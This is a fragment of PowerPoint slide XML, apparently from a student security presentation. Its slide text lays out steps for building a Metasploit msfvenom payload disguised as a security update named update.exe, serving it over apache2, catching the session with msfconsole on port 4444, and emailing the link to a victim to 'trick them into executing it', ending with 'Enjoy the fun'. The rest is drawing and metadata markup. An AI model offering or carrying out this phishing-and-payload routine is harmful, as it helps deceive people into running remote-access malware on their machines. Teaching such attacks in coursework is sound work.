                    <a:pt x="221632" y="297454"/>
                    <a:pt x="185577" y="297454"/>
                    <a:pt x="149522" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113467" y="297454"/>
                    <a:pt x="77412" y="297454"/>
                    <a:pt x="41357" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14315" y="297454"/>
                    <a:pt x="0" y="283138"/>
                    <a:pt x="0" y="256096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="184517"/>
                    <a:pt x="0" y="112937"/>
                    <a:pt x="0" y="41357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="14315"/>
                    <a:pt x="14846" y="0"/>
                    <a:pt x="4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416638" y="1629859"/>
            <a:ext cx="67811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Step 1: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sudoing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and Know your IP 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Step 2: Use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msfvenom’s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payload to create a server with apache2, with an executable program name update.exe, which will be treated as a security patch update.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Step 3: Use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msfconsole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to exploit, with the IP Address and default port 4444.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Step 4: send an email including the link with the following format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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://[IP]/update.exe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to the target and trick them into executing it.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Step 5: Enjoy the fun. Remember to migrate it onto another process.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136A6F70-EC0E-44A0-92BC-82B2BEB44690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9151902" y="3174330"/>
            <a:ext cx="687792" cy="883022"/>
            <a:chOff x="3425127" y="0"/>
            <a:chExt cx="5341746" cy="68580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99BCC67-341C-42B6-8A43-DD85BF186024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8AFCEAF-F4F5-4EF4-A7E9-9C9498ACDDF2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97606A-71FB-4B0F-8F14-0903161DE588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038230-1B10-40D1-88FC-2BB96F9ABBB2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FCB2FB4-751A-4CF8-AB19-A88C8FA55DA2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382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dirty="0" err="1"/>
              <a:t>sudoing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and know your IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 5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3C4D23C9-8F57-2E7F-1190-63D042AB9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54" y="1062267"/>
            <a:ext cx="10420709" cy="5252269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B011530-D98B-9383-716B-69B010CC4008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="1786514"/>
            <a:ext cx="1837426" cy="3269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9452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592</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen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Nguyen Minh Tuan 20213737</cp:lastModifiedBy>
  <cp:revision>86</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-20T05:08:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-22T18:31:13Z</dcterms:modified>
</cp:coreProperties>
</file>